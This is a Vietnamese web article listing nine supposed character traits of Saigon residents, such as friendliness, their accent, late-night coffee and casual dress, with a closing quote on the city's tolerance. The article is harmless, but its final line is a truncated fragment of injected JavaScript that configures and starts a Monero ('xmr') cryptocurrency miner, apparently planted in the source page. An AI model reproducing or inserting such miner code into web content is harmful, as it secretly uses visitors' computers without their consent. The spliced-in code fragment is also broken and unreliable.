KHÁM PHÁ 9 NÉT TÍNH CÁCH NGƯỜI SÀI GÒN - Tôn Thất Phước sưu tầm -

KHÁM PHÁ
9 NÉT TÍNH CÁCH NGƯỜI SÀI GÒN
Tôn Thất Phước sưu tầm

Người Sài Gòn: Saïgonnais; số nhiều Saigonese (Tiếng Pháp)
Không thanh lịch như người Hà Nội, không nhẹ nhàng như người Huế, những người sinh ra và lớn lên ở Sài Gòn sở hữu sự năng động hiếm thấy ... Xưa nay đặc tính của người Sài Gòn là bao dung, cởi mở, chấp nhận người lưu dân tứ xứ.
1. Thân thiện:
Sài Gòn khiến biết bao người đến đây phải cảm động và ấm lòng bằng những điều giản dị vô cùng. Du lịch Sài Gòn, dù bạn hỏi thăm đường hay chuyện trò vài câu với bất kỳ ai, bạn đều nhận được câu trả lời ngọt ngào và thân thiện đến lạ. Ở đây, thì vì xưng cháu, người ta tự xưng bằng dì, bằng ngoại, bằng con thân thiết như người trong gia đình.
2. Có giọng nói đặc biệt:
Chất giọng Sài Gòn có như hiện nay là do pha trộn âm điệu giữa ba miền Bắc Trung Nam mà ra. Với giọng nền là giọng Nam bộ, cứng rắn, mạnh mẽ pha chút đỏng đảnh tạo thành chất giọng đặc trưng không lẫn đi đâu được. Người Sài Gòn có cách phát âm sai vài từ âm cuối. Những cặp từ "nhạc và nhạt”, "gòn và goòng”, "ít và ích”, hay phụ âm đầu "v và z”… nghe như đồng âm.
3. Sống thực tế:
Họ sống đúng con người mình với khả năng cho phép của mình, không giả tạo, không đua đòi. Nhìn một người Sài Gòn, bạn sẽ khó có thể đoán được, người đó giàu hay nghèo; là trí thức hay kinh doanh; đang đi chơi hay đi làm …


4. Đơn giản chuyện ăn uống:
Họ rất dễ dãi chuyện ăn uống, miễn sao được ăn no và đầy đủ chất, chứ không cần trang trí cầu kỳ.5. Không từ chối giúp đỡ người khác:
Nếu gặp bất cứ khó khăn bạn đừng ngần ngại nhờ người Sài Gòn. Họ chưa bao giờ nói không với người dưng, và từ chối giúp đỡ người khác.

6. Chấp hành tốt luật giao thông:
Người trẻ Sài Gòn luôn học cách tiếp thu các thói quen văn minh và văn hóa lịch sự nhanh chóng. Dường như khí chất đàng hoàng đã ngấm vào mỗi người dân nơi đây.7. Hay nhớ về quá khứ:
Sài Gòn được biết đến là thành phố không ngủ về đêm, sôi động và hiện đại là thế nhưng trong thâm tâm của người Sài Gòn đều chất chứa những nỗi niềm về thời quá khứ xưa cũ, của những năm tháng thơ ấu.
8. Thích uống cà phê đêm:
Họ thích lao ra đường lúc 9 giờ tối, tìm những khoảng khắc thư giãn bên những quán cà phê hoạt động xuyên đêm và nhấm nháp ly cà phê ấm nóng/ mát lạnh …
9. Ít chú ý đến trang phục:
Họ không quan tâm đến trang phục, trừ vào những dịp đặc biệt. Ra đường, người Sài Gòn chỉ thích ăn vận thoải mái, đi giày dép tùy tiện, miễn sao không lôi thôi. Họ đặc biệt thích mặc quần jeans và áo pull, kể cả trong tiệc cưới mà không mảy may lo sợ bản thân bị đánh giá.

Trích: Du lịch Tầm nhìn Việt.

TTO: Xưa nay đặc tính của người Sài Gòn là bao dung, cởi mở, chấp nhận người lưu dân tứ xứ. Tinh thần đó hiện nay đang được phản ánh qua sự giúp đỡ người nghèo khổ, gặp khó khăn về kinh tế, công ăn việc làm do dịch bệnh .. (TS Nguyễn Đức Hiệp) Ông là chuyên gia môi trường và di sản tại Úc. Tác giả bộ 4 cuốn biên khảo Sài Gòn Chợ Lớn và mới nhất là cuốn Sài Gòn và Nam kỳ trong thời kỳ canh tân 1875 - 1925.


 
 
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();